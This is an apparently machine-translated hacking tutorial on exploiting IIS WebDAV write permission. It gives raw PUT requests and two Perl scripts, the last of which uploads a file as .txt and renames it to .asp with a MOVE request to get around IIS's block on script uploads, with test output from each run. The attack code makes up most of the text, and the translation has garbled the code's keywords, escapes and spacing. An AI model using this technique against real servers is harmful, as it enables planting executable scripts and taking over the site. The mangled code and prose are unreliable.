Everyone may have seen the "Remote Analysis IIS Settings", which analyzes the various settings of IIS. I will analyze the write permission of IIS. The following references "Remote Analysis IIS Settings" article pairs IIS write permission analysis content:
Write permission
Test a directory for WEB users have write permissions, use the following method: Telnet to the server's web port (80) and send a request:
Put /DIR/MY_FILE.TXT HTTP / 1.1
Host: IIS-Server
Content-Length: 10
At this time, the server returns a 100 (continued) information:
HTTP / 1.1 100 Continue
Server: Microsoft-IIS / 5.0
Date: Thu, 28 Feb 2002 15:56:00 GMT
Then we enter 10 letters:
Aaaaaaaaaaaaa
After sending this request, see the return information of the server if it is a 201 CREATED response:
HTTP / 1.1 201 CREATED
Server: Microsoft-IIS / 5.0
Date: Thu, 28 Feb 2002 15:56:08 GMT
Location: http://iis-server/dir/my_file.txt
Content-Length: 0
Allow: Options, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND,
Proppatch, Search, Lock, Unlock
Then explain the write authority of this directory is open. Opened writes, but anonymous users are not allowed. If a directory has also opened "Write" and "Script and Executable Programs", then web users can upload a program and perform it, horror oh% ^ # $! ~
Here is a brief explanation:
Put /DIR/MY_FILE.TXT HTTP / 1.1
Host: IIS-Server
Content-Length: 10
PUT: Request the server to store the entity of the attachment in the provided request URL, if the request URL points to the resource already exists, the attachment entity should be seen as a modified version of the resource on the current original server. If the request URL does not point to the existing resource, the URL will be defined by the requested user agent into a new resource, and the original server will use this URL to generate this resource.
Host: is the send address of HTTP request
Content-length: is the length of the content, that is, the length of the solid, the length value, and the uploaded file size
Submit Using NC (Telnet), we write a simple Perl program here to complete this complex submission process. When we write code, we open the file with binmode (), the code is as follows:
#! / usr / bin / perl
Use IO :: Socket;
$ Argc = @argv;
IF ($ argc! = 4)
{
Print "USAGE: $ 0 127.0.0.1 80 kaka.exe /scripts/file.exe/n";
EXIT;
}
$ Host = @argv [0];
$ port = @argv [1];
$ file = @argv [2];
$ PATH = @argv [3];
@ s = stat ("$ file");
$ SIZE = $ s [7]; # get file size Print "$ file size is $ size bytes / n";
MY $ SOCK = IO :: Socket :: inet-> new (proto => "tcp",
Peeraddr => $ Host,
Peerport => $ port) || DIE "Sorry! Could Not connect to $ host / n";
Print $ SOCK "PUT $ PATH HTTP / 1.1 / N";
Print $ SOCK "Host: $ Host / N";
Print $ SOCK "Content-Length: $ SIZE / N / N"; #SOCK connection
Open (File, "$ file");
BINMODE (file); # with 2-way open file
WHILE (READ (File, $ Char, 1024)) {# read file data upload
Print $ SOCK "$ char";
}
Print $ SOCK "/ N / N";
@REQ = <$ sock>;
Print "please wait ... / n";
Sleep (2);
IF ($ REQ [4] = ~ / 200 | 201 /) {
Print "Upfile succeed !!!"; # successfully displayed
}
Else {
Print "Upfile Faile !!! / N / N";
Print @Req; # If the failed display returns an error
}
CLOSE $ SOCK;
Close file;
Let's test below:
C: / usr / bin> Perl.exe Iiswt.pl 127.0.0.1 80 kaka.txt /scripts/kaka.txt
Kaka.txt size is 14 bytes
Please wait ...
Upfile succeed !!!
C: / inetpub / scripts> dir kaka.txt
The volume in the drive C does not have a label.
The serial number of the volume is 3CD1-479E
C: / INETPUB / SCRIPTS directory
2004-05-05 00:37 14 kaka.txt
1 file 14 bytes
0 catalog 3,871,080,448 available bytes
Here we successfully upload Kaka.txt to the web directory scripts, in which the binmode () mode (2) opened files in the program, you should be able to upload other files, let us test the exe file:
C: / usr / bin> Perl.exe Iiswt.pl 127.0.0.1 80 perl.exe /scripts/perl.exe
Perl.exe size is 20535 bytes
Please wait ...
Upfile succeed !!!
C: / inetpub / scripts> Dir perl.exe
The volume in the drive C does not have a label.
The serial number of the volume is 3CD1-479E
C: / INETPUB / SCRIPTS directory
2004-05-05 00:42 20,535 Perl.exe
1 file 20,535 bytes
0 catalog 3,871,031,296 available bytes
Success, you can upload EXE, is it possible to go upload any file? Then test the ASP file:
C: / usr / bin> Perl.exe Iiswt.pl 127.0.0.1 80 kaka.asp /scripts/kaka.asp
Kaka.asp size is 4 bytes
Please wait ...
Upfile faile !!! HTTP / 1.1 100 Continue
Server: Microsoft-IIS / 5.0
Date: Tue, 04 May 2004 16:45:51 GMT
HTTP / 1.1 403 Forbidden
Server: Microsoft-IIS / 5.0
Date: Tue, 04 May 2004 16:45:51 GMT
Connection: Close
Content-Type: Text / HTML
Content-Length: 44
failure! ! Tip http / 1.1 403 Forbidden error, it seems that it is not possible to write ASP directly in Post mode. If it is tested, it will generate an HTTP / 1.1 403 forbidden error.
Then how can we upload the file type file supported by IIS? In addition to the action of PUT, POST, GET, IIS can execute commands, huh! We can first upload local ASP to other files such as TXT below the remote host web directory, and will be changed to the ASP.
We still use NC to submit tests:
D: /> NC 127.0.0.1 80
Move /scripts/kaka.txt http / 1.1
Host: 127.0.0.1
Destination: http://127.0.0.1/scripts/kaka.asp
HTTP / 1.1 201 CREATED
Server: Microsoft-IIS / 5.0
Date: Sun, 05 Oct 2003 09:30:59 GMT
Location: http://127.0.0.1/scripts/x.asp
Content-Type: Text / XML
Content-Length: 0
Successfully uses Move /scripts/kaka.txt to change the name /scripts/kaka.asp. This way we can combine PUT and MOVE to complete the IIS write easy file :). We still use Perl to do.
Test written ASP success:
C: / usr / bin> Perl kaka.pl 127.0.0.1 80 kaka.asp /scripts/kaka.asp
*********************************************************** **********
Codz by ≯superhei
*********************************************************** **********
Kaka.asp size is 4 bytes
Please wait ...
Upfile succeed !!!
Modifyfile succeed !!!
The final IiSWRITE.PL code is as follows (when writing this article, the code in the Internet cafes is first "draft", and the LANKER test and finally completed, THX lanker.):
#! / usr / bin / perl
#The Iiswrite Script
Use IO :: Socket;
$ Argc = @argv;
PRINT "*" x 60;
Print "/ ncodz by ≯superhei
Print "*" x 60, "/ n"; if ($ argc! = 4)
{
Print "USAGE: $ 0 127.0.0.1 80 kaka.txt /scripts/my_file.txt/n";
EXIT;
}
$ Host = @argv [0];
$ port = @argv [1];
$ PATH = @argv [3];
$ file = @argv [2];
@ Path = Split ("/", $ PATH);
$ any = POP (@Path);
$ PATH1 = JOIN ("/", @ PATH);
@ s = stat ("$ file");
$ SIZE = $ S [7];
Print "$ FILE SIZE IS $ SIZE BYTES / N";
MY $ SOCK = IO :: Socket :: inet-> new (proto => "tcp",
Peeraddr => $ Host,
Peerport => $ port) || DIE "Sorry! Could Not connect to $ host / n";
Print $ SOCK "PUT $ Path1 / Lanker.txt HTTP / 1.1 / N";
Print $ SOCK "Host: $ Host / N";
Print $ SOCK "Content-Length: $ SIZE / N / N";
Open (File, "$ file") || DIE "can't open $ file";
Binmode (file);
While (READ (File, $ Char, 1024)) {
Print $ SOCK "$ char";
}
Print $ SOCK "/ N / N";
@REQ = <$ sock>;
Print "please wait ... / n";
Sleep (2);
IF ($ REQ [4] = ~ / 200 | 201 /) {
Print "Upfile succeed !!! / n";
}
Else {
Print "Upfile Faile !!! / N";
}
CLOSE $ SOCK;
Close file;
MY $ SOCK = IO :: Socket :: inet-> new (proto => "tcp",
Peeraddr => $ Host,
Peerport => $ port) || DIE "Sorry! Could Not connect to $ host / n";
Print $ SOCK "Move $ Path1 / LANKER.TXT HTTP / 1.1 / N";
Print $ SOCK "Host: $ Host / N";
Print $ SOCK "DESTINATION: http: // $ host: $ port $ path / n / n / n / n";
@REQ = <$ sock>;
IF ($ REQ [0] = ~ / 20 / d | /) {
Print "ModifyFile success !!!";
}
Else {
Print "Upfile faile !!!";
}
CLOSE $ SOCK;